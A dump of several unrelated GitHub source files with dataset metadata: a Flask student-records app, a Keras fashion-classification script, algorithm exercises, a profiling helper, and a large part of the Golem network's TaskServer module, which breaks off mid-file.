methods=['POST','GET'])\r\ndef tambahdata():\r\n if request.method=='POST' and request.form['submit']:\r\n student_id = request.form['student_id']\r\n student_name = request.form['student_name']\r\n student_class = request.form['student_class']\r\n student_gender = request.form['student_gender']\r\n favorite_course = request.form['favorite_course']\r\n reason = request.form['reason']\r\n\r\n if db.create(student_id, student_name, student_class, student_gender, favorite_course, reason):\r\n flash('Data Berhasil Ditambahkan!')\r\n\r\n else:\r\n flash('Data Tidak Berhasil Ditambahkan!') \r\n \r\n return redirect(url_for('index'))\r\n \r\n else:\r\n return redirect('index')\r\n\r\n # Update data\r\n@app.route('/update/')\r\ndef update(id,):\r\n data = db.readById(id)\r\n session['update'] = id\r\n return render_template('update.html', data=data)\r\n\r\n@app.route('/updatedata', methods = ['GET', 'POST'])\r\ndef updatedata():\r\n if request.method == 'POST' and request.form['update']:\r\n student_id = request.form['student_id']\r\n student_name = request.form['student_name']\r\n student_class = request.form['student_class']\r\n student_gender = request.form['student_gender']\r\n favorite_course = request.form['favorite_course']\r\n reason = request.form['reason']\r\n\r\n if db.update(student_id, student_name, student_class, student_gender, favorite_course, reason, session['update']):\r\n flash('Data Berhasil Diperbarui!')\r\n else:\r\n flash('Data Tidak Berhasil Diperbarui!')\r\n return redirect (url_for('index'))\r\n\r\n # Hapus Data\r\n@app.route('/hapus/', methods = ['GET', 'POST'])\r\ndef hapus(id):\r\n if request.method == 'GET':\r\n if db.delete(id):\r\n flash('Data Berhasil Dihapus!')\r\n else:\r\n flash('Data Tidak Berhasil Dihapus!')\r\n return redirect (url_for('index'))\r\n \r\nif __name__=='__main__':\r\n app.run(debug=True)","repo_name":"Ryrisma13/Uciha","sub_path":"aap.py","file_name":"aap.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32754923961","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom argparse import ArgumentParser\nfrom fashion_code.constants import num_classes, paths\nfrom fashion_code.generators import SequenceFromDisk\nfrom fashion_code.util import create_submission\nfrom keras.applications.xception import preprocess_input\nfrom keras.layers import Dense, Dropout, Input\nfrom keras.models import Model, load_model\nfrom keras.optimizers import Adam\nfrom keras.utils import multi_gpu_model\nfrom os.path import join\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import f1_score\nimport numpy as np\nimport sys\nimport tensorflow as tf\n\n\ndef rf_transformer():\n return RandomForestClassifier(n_estimators=200, n_jobs=8, verbose=1)\n\n\ndef nn_transformer():\n inputs = Input(shape=(num_classes,))\n x = inputs\n for i in range(4):\n x = Dense(num_classes*(2+i), activation='relu',\n name='trans_dense_{}'.format(i),\n kernel_initializer='he_normal')(x)\n x = Dropout(.3, name='trans_dropout_{}'.format(i))(x)\n outputs = Dense(num_classes, activation='sigmoid', name='trans_out',\n kernel_initializer='he_normal')(x)\n transformer = Model(inputs, outputs)\n\n optimizer = Adam(decay=1e-5)\n transformer.compile(optimizer=optimizer, loss='binary_crossentropy')\n return transformer\n\n\ndef generate_data(model, batch_size):\n train_gen = SequenceFromDisk('train', batch_size, (299, 299),\n preprocessfunc=preprocess_input)\n valid_gen = SequenceFromDisk('validation', batch_size, (299, 299),\n preprocessfunc=preprocess_input)\n\n x_train = model.predict_generator(train_gen,\n use_multiprocessing=True,\n workers=8,\n verbose=1)\n x_valid = model.predict_generator(valid_gen,\n use_multiprocessing=True,\n workers=8,\n verbose=1)\n y_train = np.load(join(paths['data'], 'labels_train.npy'))\n y_valid = np.load(join(paths['data'], 'labels_validation.npy'))\n\n return x_train, x_valid, y_train, y_valid\n\n\nif __name__ == '__main__':\n p = ArgumentParser('Predict transformations for a given neural network')\n p.add_argument('filename', type=str,\n help='The saved model to create initial predictions')\n p.add_argument('--save-filename', type=str,\n help='Model to train transformer on top of')\n p.add_argument('--epochs', type=int, default=10, help='Epochs')\n p.add_argument('--batch-size', type=int, default=128, help='Batch size')\n p.add_argument('--create-submission', action='store_true')\n args = p.parse_args()\n\n batch_size = args.batch_size\n fname = join(paths['models'], args.filename)\n save_filename = args.save_filename\n model = multi_gpu_model(load_model(fname), cpu_relocation=True)\n threshold = .5\n epochs = args.epochs\n\n x_train, x_valid, y_train, y_valid = generate_data(model, batch_size)\n\n # TODO: add random forest classifier\n\n transformer = nn_transformer()\n transformer.fit(x_train, y_train,\n validation_data=(x_valid, y_valid),\n epochs=epochs,\n verbose=1)\n transformer.save(join(paths['models'], save_filename))\n\n valid_preds = transformer.predict(x_valid,\n batch_size=batch_size,\n verbose=1) > threshold\n score = f1_score(y_valid, valid_preds, average='micro')\n print('F1 score on validation: {:.4f}'.format(score))\n\n if args.create_submission:\n print('Creating submission...')\n test_gen = SequenceFromDisk('test', batch_size, (299, 299),\n preprocessfunc=preprocess_input)\n initial_preds = model.predict_generator(test_gen,\n use_multiprocessing=True,\n workers=8,\n verbose=1)\n y_pred = transformer.predict(initial_preds,\n batch_size=batch_size,\n verbose=1)\n create_submission(y_pred, save_filename)\n\n sys.exit(0)\n","repo_name":"KDercksen/hunter2_fashion","sub_path":"scripts/prediction_transformer.py","file_name":"prediction_transformer.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"17793576","text":"# video 23: run length encoding : aaaavv -> a4v2\n# given a string , just compress it with number\ndef sol(lets):\n arr = []\n cnt = 1\n for i in range(1, len(lets)):\n clet = lets[i]\n nlet = lets[i - 1]\n \n if clet != nlet:\n arr.append(nlet)\n arr.append(str(cnt))\n cnt = 0\n\n cnt += 1\n arr.append(lets[len(lets) - 1])\n arr.append(str(cnt))\n \n return \"\".join(arr)\n\n\n# print(sol(\"1111av\"))\n\n# time O(n) | space O(n)\n","repo_name":"xrayapu/algoExpertSolution","sub_path":"easy/vi_23_run_lenght_encoding.py","file_name":"vi_23_run_lenght_encoding.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26076399145","text":"import timeit as timeit_\n\n__all__ = [\n 'Profiler',\n]\n\n\nclass Profiler:\n\n def __init__(self, globals):\n self._globals = globals\n\n def timeit(self, *args, globals=None, number=timeit_.default_number):\n globals = globals or self._globals\n for code in args:\n print('>>>', code)\n dt = timeit_.timeit(code, globals=globals, number=number)\n print(f'{dt:.1f}s')\n\n def profile(self, f):\n import cProfile\n import os\n import shutil\n import subprocess\n import tempfile\n prof = cProfile.Profile()\n prof.runcall(f)\n tmpdir = tempfile.mkdtemp()\n proffile = os.path.join(tmpdir, 'profile')\n prof.dump_stats(proffile)\n cgraphfile = os.path.join(tmpdir, 'callgraph')\n subprocess.run(['pyprof2calltree', '-k', '-i', proffile,\n '-o', cgraphfile], check=True)\n","repo_name":"IBM/ULKB","sub_path":"tests/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"7"} +{"seq_id":"31028888145","text":"from typing import List\n#3.5之后引入类型限定var:type,返回值->type\nclass Solution:\n def prefixesDivBy5(self, A: List[int]) -> List[bool]:\n n = len(A)\n res = [0 for x in range(0,n)]\n cur = 0\n for i in range(n):\n cur = cur <<1\n if(cur >= 10):\n cur -= 10\n cur += A[i]\n if cur % 5 == 0:\n res[i] = True \n return res","repo_name":"lock19960613/SCL","sub_path":"Daily/PY/Leetcode1018-能被5整除的二进制前缀.py","file_name":"Leetcode1018-能被5整除的二进制前缀.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12600440737","text":"# 给定两个大小分别为 m 和 n 的正序(从小到大)数组 nums1 和 nums2。请你找出并返回这两个正序数组的 中位数 。\n#\n#\n#\n# 示例 1:\n#\n#\n# 输入:nums1 = [1,3], nums2 = [2]\n# 输出:2.00000\n# 解释:合并数组 = [1,2,3] ,中位数 2\n#\n#\n# 示例 2:\n#\n#\n# 输入:nums1 = [1,2], nums2 = [3,4]\n# 输出:2.50000\n# 解释:合并数组 = [1,2,3,4] ,中位数 (2 + 3) / 2 = 2.5\n#\n#\n# 示例 3:\n#\n#\n# 输入:nums1 = [0,0], nums2 = [0,0]\n# 输出:0.00000\n#\n#\n# 示例 4:\n#\n#\n# 输入:nums1 = [], nums2 = [1]\n# 输出:1.00000\n#\n#\n# 示例 5:\n#\n#\n# 输入:nums1 = [2], nums2 = []\n# 输出:2.00000\n#\n#\n#\n#\n# 提示:\n#\n#\n# nums1.length == m\n# nums2.length == n\n# 0 <= m <= 1000\n# 0 <= n <= 1000\n# 1 <= m + n <= 2000\n# -106 <= nums1[i], nums2[i] <= 106\n#\n#\n#\n#\n# 进阶:你能设计一个时间复杂度为 O(log (m+n)) 的算法解决此问题吗?\n# Related Topics 数组 二分查找 分治算法\n# 👍 3970 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom typing import List\n\n\nclass Solution(object):\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n if len(nums1) > len(nums2):\n return self.findMedianSortedArrays(nums2, nums1)\n\n infinty = 2 ** 40\n m, n = len(nums1), len(nums2)\n left, right = 0, m\n # median1:前一部分的最大值\n # median2:后一部分的最小值\n median1, median2 = 0, 0\n\n while left <= right:\n # 前一部分包含 nums1[0 .. i-1] 和 nums2[0 .. j-1]\n # // 后一部分包含 nums1[i .. m-1] 和 nums2[j .. n-1]\n i = (left + right) // 2\n j = (m + n + 1) // 2 - i\n\n # nums_im1, nums_i, nums_jm1, nums_j 分别表示 nums1[i-1], nums1[i], nums2[j-1], nums2[j]\n nums_im1 = (-infinty if i == 0 else nums1[i - 1])\n nums_i = (infinty if i == m else nums1[i])\n nums_jm1 = (-infinty if j == 0 else nums2[j - 1])\n nums_j = (infinty if j == n else nums2[j])\n\n if nums_im1 <= nums_j:\n median1, median2 = max(nums_im1, nums_jm1), min(nums_i, nums_j)\n left = i + 1\n else:\n right = i - 1\n\n return (median1 + median2) / 2 if (m + n) % 2 == 0 else median1\n\n\nif __name__ == '__main__':\n result = Solution().findMedianSortedArrays([1, 3], [2])\n print(result)\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"sjr7/leetcode","sub_path":"python/problems/[4]寻找两个正序数组的中位数.py","file_name":"[4]寻找两个正序数组的中位数.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71040031263","text":"# pylint: disable=too-many-instance-attributes,too-many-public-methods,\r\n# pylint: disable=too-many-lines\r\n\r\nimport asyncio\r\nimport datetime\r\nimport functools\r\nimport itertools\r\nimport logging\r\nimport os\r\nimport shutil\r\nimport time\r\nimport weakref\r\nfrom enum import Enum\r\nfrom pathlib import Path\r\nfrom typing import (\r\n Any,\r\n Dict,\r\n List,\r\n Optional,\r\n Union,\r\n Set,\r\n Tuple,\r\n TYPE_CHECKING,\r\n)\r\nfrom dataclasses import dataclass, field\r\n\r\nfrom golem_messages import exceptions as msg_exceptions\r\nfrom golem_messages import message\r\nfrom golem_messages.datastructures import tasks as dt_tasks\r\nfrom golem_messages.datastructures.masking import Mask\r\nfrom pydispatch import dispatcher\r\nfrom twisted.internet import defer\r\nfrom twisted.internet.defer import inlineCallbacks, Deferred, \\\r\n TimeoutError as DeferredTimeoutError\r\n\r\nfrom apps.appsmanager import AppsManager\r\nfrom apps.core.task.coretask import CoreTask\r\nfrom golem import constants as gconst\r\nfrom golem.apps import manager as app_manager\r\nfrom golem.clientconfigdescriptor import ClientConfigDescriptor\r\nfrom golem.core.common import (\r\n short_node_id,\r\n deadline_to_timeout,\r\n get_log_dir,\r\n get_timestamp_utc,\r\n)\r\nfrom golem.core.deferred import (\r\n asyncio_main_loop,\r\n deferred_from_future,\r\n sync_wait,\r\n)\r\nfrom golem.core.variables import MAX_CONNECT_SOCKET_ADDRESSES, ENV_TASK_API_DEV\r\nfrom golem.environments.environment import (\r\n Environment as OldEnv,\r\n SupportStatus,\r\n UnsupportReason,\r\n)\r\nfrom golem.envs import Environment as NewEnv\r\nfrom golem.envs.default import (\r\n register_environments,\r\n register_built_in_repositories,\r\n)\r\nfrom golem.marketplace import ProviderPricing\r\nfrom golem.model import TaskPayment\r\nfrom golem.network.hyperdrive.client import HyperdriveAsyncClient\r\nfrom golem.network.transport import msg_queue\r\nfrom golem.network.transport.network import ProtocolFactory, SessionFactory\r\nfrom golem.network.transport.tcpnetwork import (\r\n TCPNetwork, SocketAddress, SafeProtocol)\r\nfrom golem.network.transport.tcpserver import (\r\n PendingConnectionsServer,\r\n)\r\nfrom golem.ranking.helper.trust import Trust\r\nfrom golem.ranking.manager.database_manager import (\r\n update_requestor_paid_sum,\r\n update_requestor_assigned_sum,\r\n update_requestor_efficiency,\r\n)\r\nfrom golem.resource.resourcehandshake import ResourceHandshake\r\nfrom golem.resource.resourcemanager import ResourceManager\r\nfrom golem.rpc import utils as rpc_utils\r\nfrom golem.task import helpers as task_helpers\r\nfrom golem.task import timer\r\nfrom golem.task.acl import get_acl, setup_acl, AclRule, _DenyAcl as DenyAcl\r\nfrom golem.task.exceptions import ComputationInProgress\r\nfrom golem.task.benchmarkmanager import AppBenchmarkManager, BenchmarkManager\r\nfrom golem.task.envmanager import EnvironmentManager\r\nfrom golem.task.helpers import calculate_subtask_payment\r\nfrom golem.task.requestedtaskmanager import RequestedTaskManager\r\nfrom golem.task.server.whitelist import DockerWhitelistRPC\r\nfrom golem.task.taskbase import AcceptClientVerdict\r\nfrom golem.task.taskconnectionshelper import TaskConnectionsHelper\r\nfrom golem.task.taskstate import TaskOp\r\nfrom golem.tools import memoryhelper\r\nfrom golem.utils import decode_hex\r\nfrom .server import concent\r\nfrom .server import helpers\r\nfrom .server import queue_ as srv_queue\r\nfrom .server import resources\r\nfrom .server import verification as srv_verification\r\nfrom .taskcomputer import TaskComputerAdapter\r\nfrom .taskkeeper import TaskHeaderKeeper\r\nfrom .taskmanager import TaskManager\r\nfrom .tasksession import TaskSession\r\n\r\nif TYPE_CHECKING:\r\n from golem_messages.datastructures import p2p as dt_p2p # noqa pylint: disable=unused-import,ungrouped-imports\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\ntmp_cycler = itertools.cycle(list(range(550)))\r\n\r\n\r\nclass TaskServer(\r\n PendingConnectionsServer,\r\n resources.TaskResourcesMixin,\r\n srv_queue.TaskMessagesQueueMixin,\r\n srv_verification.VerificationMixin,\r\n DockerWhitelistRPC,\r\n):\r\n\r\n BENCHMARK_TIMEOUT = 60 # s\r\n RESULT_SHARE_TIMEOUT = 3600 * 24 * 7 * 2 # s\r\n\r\n # pylint: disable=too-many-arguments,too-many-locals,too-many-statements\r\n def __init__(\r\n self,\r\n node,\r\n config_desc: ClientConfigDescriptor,\r\n client,\r\n use_ipv6=False,\r\n use_docker_manager=True,\r\n task_archiver=None,\r\n apps_manager=AppsManager(),\r\n task_finished_cb=None\r\n ) -> None:\r\n DockerWhitelistRPC.__init__(self)\r\n\r\n self.client = client\r\n self.keys_auth = client.keys_auth\r\n self.config_desc = config_desc\r\n\r\n Path(self.get_task_computer_root()).mkdir(parents=True, exist_ok=True)\r\n\r\n runtime_logs_dir = get_log_dir(client.datadir)\r\n new_env_manager = EnvironmentManager(runtime_logs_dir)\r\n register_built_in_repositories()\r\n task_api_dev_mode = ENV_TASK_API_DEV in os.environ \\\r\n and os.environ[ENV_TASK_API_DEV] == \"1\"\r\n register_environments(\r\n work_dir=self.get_task_computer_root(),\r\n env_manager=new_env_manager,\r\n dev_mode=task_api_dev_mode,\r\n )\r\n\r\n self.app_manager = app_manager.AppManager(self.get_app_dir())\r\n\r\n self.node = node\r\n self.task_archiver = task_archiver\r\n self.task_keeper = TaskHeaderKeeper(\r\n old_env_manager=client.environments_manager,\r\n new_env_manager=new_env_manager,\r\n node=self.node,\r\n min_price=config_desc.min_price,\r\n task_archiver=task_archiver)\r\n self.task_manager = TaskManager(\r\n self.node,\r\n self.keys_auth,\r\n root_path=TaskServer.__get_task_manager_root(client.datadir),\r\n config_desc=config_desc,\r\n tasks_dir=os.path.join(client.datadir, 'tasks'),\r\n apps_manager=apps_manager,\r\n finished_cb=task_finished_cb,\r\n )\r\n\r\n self.requested_task_manager = RequestedTaskManager(\r\n app_manager=self.app_manager,\r\n env_manager=new_env_manager,\r\n public_key=self.keys_auth.public_key,\r\n root_path=Path(TaskServer.__get_task_manager_root(client.datadir)),\r\n )\r\n self.new_resource_manager = ResourceManager(HyperdriveAsyncClient(\r\n config_desc.hyperdrive_rpc_port,\r\n config_desc.hyperdrive_rpc_address,\r\n ))\r\n benchmarks = self.task_manager.apps_manager.get_benchmarks()\r\n self.benchmark_manager = BenchmarkManager(\r\n node_name=config_desc.node_name,\r\n task_server=self,\r\n root_path=self.get_task_computer_root(),\r\n benchmarks=benchmarks\r\n )\r\n self.app_benchmark_manager = AppBenchmarkManager(\r\n env_manager=new_env_manager,\r\n root_path=Path(self.get_task_computer_root()),\r\n )\r\n self.task_computer = TaskComputerAdapter(\r\n task_server=self,\r\n env_manager=new_env_manager,\r\n use_docker_manager=use_docker_manager,\r\n finished_cb=task_finished_cb)\r\n deferred = self._change_task_computer_config(\r\n config_desc=config_desc,\r\n run_benchmarks=self.benchmark_manager.benchmarks_needed()\r\n )\r\n try:\r\n sync_wait(deferred, self.BENCHMARK_TIMEOUT)\r\n except DeferredTimeoutError:\r\n logger.warning('Benchmark computation timed out')\r\n\r\n self.task_connections_helper = TaskConnectionsHelper()\r\n self.task_connections_helper.task_server = self\r\n self.sessions: Dict[str, TaskSession] = {}\r\n self.task_sessions_incoming: weakref.WeakSet = weakref.WeakSet()\r\n\r\n self.max_trust = 1.0\r\n self.min_trust = 0.0\r\n\r\n self.last_messages: List[Any] = []\r\n\r\n self.results_to_send: Dict[str, Any] = {}\r\n self.failures_to_send: Dict[str, Any] = {}\r\n\r\n self.use_ipv6 = use_ipv6\r\n\r\n self.forwarded_session_request_timeout = \\\r\n config_desc.waiting_for_task_session_timeout\r\n self.forwarded_session_requests: Dict[str, Any] = {}\r\n self.acl = get_acl(\r\n self.client, max_times=config_desc.disallow_id_max_times)\r\n self.acl_ip = DenyAcl(\r\n self.client, max_times=config_desc.disallow_ip_max_times)\r\n self.resource_handshakes: Dict[str, ResourceHandshake] = {}\r\n self.requested_tasks: Set[str] = set()\r\n self._last_task_request_time: float = time.time()\r\n\r\n network = TCPNetwork(\r\n ProtocolFactory(SafeProtocol, self, SessionFactory(TaskSession)),\r\n use_ipv6)\r\n PendingConnectionsServer.__init__(self, config_desc, network)\r\n srv_queue.TaskMessagesQueueMixin.__init__(self)\r\n # instantiate ReceivedMessageHandler connected to self\r\n # to register in golem.network.concent.handlers_library\r\n from golem.network.concent import \\\r\n received_handler as concent_received_handler\r\n self.concent_handler = \\\r\n concent_received_handler.TaskServerMessageHandler(self)\r\n\r\n dispatcher.connect(\r\n self.income_listener,\r\n signal='golem.income'\r\n )\r\n dispatcher.connect(\r\n self.finished_subtask_listener,\r\n signal='golem.taskcomputer'\r\n )\r\n dispatcher.connect(\r\n self.finished_task_listener,\r\n signal='golem.taskmanager'\r\n )\r\n\r\n def sync_network(self, timeout=None):\r\n if timeout is None:\r\n timeout = self.config_desc.task_session_timeout\r\n jobs = (\r\n functools.partial(\r\n super().sync_network,\r\n timeout=timeout,\r\n ),\r\n self._sync_pending,\r\n self._send_waiting_results,\r\n self._request_random_task,\r\n self.task_computer.check_timeout,\r\n self.task_connections_helper.sync,\r\n self._sync_forwarded_session_requests,\r\n self.__remove_old_tasks,\r\n functools.partial(\r\n concent.process_messages_received_from_concent,\r\n concent_service=self.client.concent_service,\r\n ),\r\n self.sweep_sessions,\r\n self.connect_to_nodes,\r\n )\r\n\r\n for job in jobs:\r\n try:\r\n job()\r\n except Exception: # pylint: disable=broad-except\r\n logger.exception(\"TaskServer.sync_network job %r failed\", job)\r\n\r\n if next(tmp_cycler) == 0:\r\n logger.debug('TASK SERVER TASKS DUMP: %r', self.task_manager.tasks)\r\n logger.debug('TASK SERVER TASKS STATES: %r',\r\n self.task_manager.tasks_states)\r\n\r\n @inlineCallbacks\r\n def pause(self):\r\n super().pause()\r\n yield CoreTask.VERIFICATION_QUEUE.pause()\r\n self.disconnect()\r\n self.quit()\r\n\r\n def resume(self):\r\n super().resume()\r\n CoreTask.VERIFICATION_QUEUE.resume()\r\n\r\n @inlineCallbacks\r\n def quit(self):\r\n try:\r\n future = self.requested_task_manager.stop()\r\n yield deferred_from_future(asyncio.wait_for(future, timeout=30.))\r\n except asyncio.TimeoutError:\r\n logger.error(\"RequestedTaskManager.stop has timed out\")\r\n\r\n self.task_computer.quit()\r\n\r\n def is_task_single_core(self, th: dt_tasks.TaskHeader) -> bool:\r\n env = self.get_environment_by_id(th.environment)\r\n if env is not None and isinstance(env, OldEnv):\r\n return env.is_single_core()\r\n return False\r\n\r\n def get_environment_by_id(\r\n self,\r\n env_id: str\r\n ) -> Optional[Union[OldEnv, NewEnv]]:\r\n \"\"\" Looks for the requested env_id in the new, then the old env_manager.\r\n Returns None when the environment is not found. \"\"\"\r\n keeper = self.task_keeper\r\n if keeper.new_env_manager.enabled(env_id):\r\n return keeper.new_env_manager.environment(env_id)\r\n return keeper.old_env_manager.get_environment_by_id(env_id)\r\n\r\n def request_task_by_id(self, task_id: str) -> None:\r\n \"\"\" Requests task possibly after successful resource handshake. \"\"\"\r\n try:\r\n task_header = self.task_keeper.task_headers[task_id]\r\n except KeyError:\r\n logger.debug(\"Task missing in TaskKeeper. task_id=%s\", task_id)\r\n return\r\n self._request_task(task_header)\r\n\r\n def _request_random_task(self) -> None:\r\n \"\"\" If there is no task currently computing and time elapsed from last\r\n request exceeds the configured request interval, choose a random\r\n task from the network to compute on our machine. \"\"\"\r\n\r\n logger.debug(\"_request_random_task... \")\r\n if time.time() - self._last_task_request_time \\\r\n < self.config_desc.task_request_interval:\r\n logger.debug(\"_request_random_task: interval not yet passed\")\r\n return\r\n\r\n if (not self.task_computer.compute_tasks) \\\r\n or (not self.task_computer.runnable):\r\n logger.debug(\r\n \"_request_random_task: task computer disabled or not ready\")\r\n return\r\n\r\n if not self.task_computer.can_take_work():\r\n logger.debug(\"_request_random_task: task computer still busy\")\r\n return\r\n\r\n compatible_tasks = self.task_computer.compatible_tasks(\r\n set(self.task_keeper.supported_tasks))\r\n\r\n task_header = self.task_keeper.get_task(\r\n exclude=self.requested_tasks, supported_tasks=compatible_tasks)\r\n\r\n if task_header is None:\r\n logger.debug(\r\n \"_request_random_task: no suitable task found. \"\r\n \"exclude=%s, supported_tasks=%s\",\r\n self.requested_tasks,\r\n compatible_tasks,\r\n )\r\n return\r\n\r\n logger.debug(\r\n \"_request_random_task: got task header: %s\", task_header)\r\n\r\n self._last_task_request_time = time.time()\r\n self.task_computer.stats.increase_stat('tasks_requested')\r\n\r\n def _request_task_error(e):\r\n logger.error(\r\n \"Failed to request task: task_id=%r, exception=%r\",\r\n task_header.task_id,\r\n e\r\n )\r\n # Unyielded deferred, fire and forget requesting a new task\r\n deferred = self._request_task(task_header)\r\n deferred.addErrback(_request_task_error) # pylint: disable=no-member\r\n\r\n @inlineCallbacks\r\n # pylint: disable=too-many-return-statements,too-many-branches\r\n def _request_task(self, theader: dt_tasks.TaskHeader) -> Deferred:\r\n try:\r\n supported = self.should_accept_requestor(theader.task_owner.key)\r\n if self.config_desc.min_price > theader.max_price:\r\n supported = supported.join(SupportStatus.err({\r\n UnsupportReason.MAX_PRICE: theader.max_price}))\r\n\r\n if (\r\n self.client.concent_service.enabled\r\n and self.client.concent_service.required_as_provider\r\n and not theader.concent_enabled\r\n ):\r\n supported = supported.join(\r\n SupportStatus.err({\r\n UnsupportReason.CONCENT_REQUIRED: True,\r\n }),\r\n )\r\n\r\n # prepare env for performance, should always exist at this point\r\n env_id = theader.environment\r\n env = self.get_environment_by_id(env_id)\r\n if env is None:\r\n supported = supported.join(\r\n SupportStatus.err(\r\n {UnsupportReason.ENVIRONMENT_MISSING: env_id}\r\n )\r\n )\r\n\r\n if not supported.is_ok():\r\n logger.debug(\r\n \"Support status. task_id=%s supported=%s\",\r\n theader.task_id,\r\n supported,\r\n )\r\n if self.task_archiver:\r\n self.task_archiver.add_support_status(\r\n theader.task_id,\r\n supported,\r\n )\r\n return None\r\n\r\n num_subtasks = 1\r\n # Check performance\r\n if isinstance(env, OldEnv):\r\n benchmark_result = env.get_benchmark_result()\r\n benchmark_score = benchmark_result.performance\r\n benchmark_cpu_usage = benchmark_result.cpu_usage\r\n if env.is_single_core():\r\n num_subtasks = self.task_computer.free_cores\r\n if num_subtasks == 0:\r\n return None\r\n else: # NewEnv\r\n try:\r\n future = asyncio.run_coroutine_threadsafe(\r\n self.app_benchmark_manager.get(\r\n theader.environment,\r\n theader.environment_prerequisites),\r\n loop=asyncio_main_loop())\r\n app_benchmark = yield Deferred.fromFuture(future)\r\n except ComputationInProgress as error:\r\n logger.debug(\r\n \"Not requesting task_id=%s: %r\",\r\n theader.task_id,\r\n error)\r\n return None\r\n except Exception: # pylint: disable=broad-except\r\n logger.exception(\"Cannot retrieve benchmark score\")\r\n return None\r\n benchmark_score = app_benchmark.score\r\n benchmark_cpu_usage = app_benchmark.cpu_usage\r\n\r\n # Check handshake\r\n handshake = self.resource_handshakes.get(theader.task_owner.key)\r\n if not handshake:\r\n logger.debug(\r\n \"Starting handshake. key_id=%r, task_id=%r\",\r\n theader.task_owner.key,\r\n theader.task_id,\r\n )\r\n self.start_handshake(\r\n key_id=theader.task_owner.key,\r\n task_id=theader.task_id,\r\n )\r\n return None\r\n handshake.task_id = theader.task_id\r\n if not handshake.success():\r\n logger.debug(\r\n \"Handshake still in progress. key_id=%r, task_id=%r\",\r\n theader.task_owner.key,\r\n theader.task_id,\r\n )\r\n return None\r\n\r\n market_strategy = self.task_manager\\\r\n .get_provider_market_strategy_for_env(theader.environment)\r\n\r\n price = market_strategy.calculate_price(\r\n ProviderPricing(\r\n price_per_wallclock_h=self.config_desc.min_price,\r\n price_per_cpu_h=self.config_desc.price_per_cpu_h,\r\n ), theader.max_price, theader.task_owner.key)\r\n\r\n wtct = message.tasks.WantToComputeTask(\r\n perf_index=benchmark_score,\r\n cpu_usage=benchmark_cpu_usage,\r\n price=price,\r\n max_resource_size=self.config_desc.max_resource_size,\r\n max_memory_size=self.config_desc.max_memory_size,\r\n num_subtasks=num_subtasks,\r\n concent_enabled=self.client.concent_service.enabled\r\n if theader.concent_enabled else False,\r\n\r\n provider_public_key=self.keys_auth.key_id,\r\n provider_ethereum_address=self.keys_auth.eth_addr,\r\n task_header=theader,\r\n )\r\n\r\n task_class = self.client.apps_manager.get_task_class_for_env(\r\n theader.environment)\r\n budget = task_class.PROVIDER_MARKET_STRATEGY.calculate_budget(wtct)\r\n self.task_manager.add_comp_task_request(\r\n task_header=theader,\r\n budget=budget,\r\n performance=benchmark_score,\r\n num_subtasks=num_subtasks,\r\n )\r\n msg_queue.put(\r\n node_id=theader.task_owner.key,\r\n msg=wtct,\r\n timeout=datetime.timedelta(\r\n seconds=deadline_to_timeout(theader.deadline))\r\n )\r\n\r\n timer.ProviderTTCDelayTimers.start(wtct.task_id)\r\n self.requested_tasks.add(theader.task_id)\r\n return theader.task_id\r\n except Exception as err: # pylint: disable=broad-except\r\n logger.warning(\"Cannot send request for task: %s\", err)\r\n logger.warning(\"Detailed traceback\", exc_info=True)\r\n self.remove_task_header(theader.task_id)\r\n\r\n return None\r\n\r\n def task_given(\r\n self,\r\n msg: message.tasks.TaskToCompute,\r\n ) -> bool:\r\n if not self.task_manager.comp_task_keeper.receive_subtask(msg):\r\n return False\r\n\r\n if not self.task_computer.can_take_work():\r\n logger.error(\"Trying to assign a task, when it's already assigned\")\r\n return False\r\n\r\n task_header: dt_tasks.TaskHeader = msg.want_to_compute_task.task_header\r\n\r\n cpu_time_limit = None\r\n task_class = self.task_manager.apps_manager.get_task_class_for_env(\r\n task_header.environment)\r\n if task_class.PROVIDER_MARKET_STRATEGY.SET_CPU_TIME_LIMIT:\r\n cpu_time_limit = task_helpers.calculate_max_usage(\r\n task_header.subtask_budget, msg.want_to_compute_task.price)\r\n\r\n self.task_computer.task_given(msg.compute_task_def, cpu_time_limit)\r\n\r\n resource_downloaded = functools.partial(\r\n self._resource_downloaded,\r\n msg.subtask_id,\r\n msg.requestor_id,\r\n msg.price)\r\n\r\n if task_header.environment_prerequisites:\r\n subtask_inputs_dir = self.task_computer.get_subtask_inputs_dir()\r\n resources_options = msg.resources_options or dict(options={})\r\n client_options = self.resource_manager.build_client_options(\r\n **resources_options.get('options', {}))\r\n\r\n deferred_list = [\r\n self.new_resource_manager.download(\r\n resource_id,\r\n subtask_inputs_dir,\r\n client_options,\r\n ) for resource_id in msg.compute_task_def['resources']\r\n ]\r\n\r\n defer.gatherResults(\r\n deferred_list,\r\n consumeErrors=True,\r\n ).addCallback(\r\n lambda _: resource_downloaded()\r\n ).addCallbacks(\r\n lambda _: self.resource_collected(msg.task_id, msg.subtask_id),\r\n lambda e: self.resource_failure(msg.task_id, e))\r\n else:\r\n self.request_resource(\r\n msg.task_id,\r\n msg.subtask_id,\r\n msg.compute_task_def['resources'],\r\n msg.resources_options,\r\n )\r\n resource_downloaded()\r\n\r\n return True\r\n\r\n def _resource_downloaded(\r\n self,\r\n subtask_id: str,\r\n requestor_id: str,\r\n price: int,\r\n ) -> None:\r\n logger.debug(\"requested_tasks 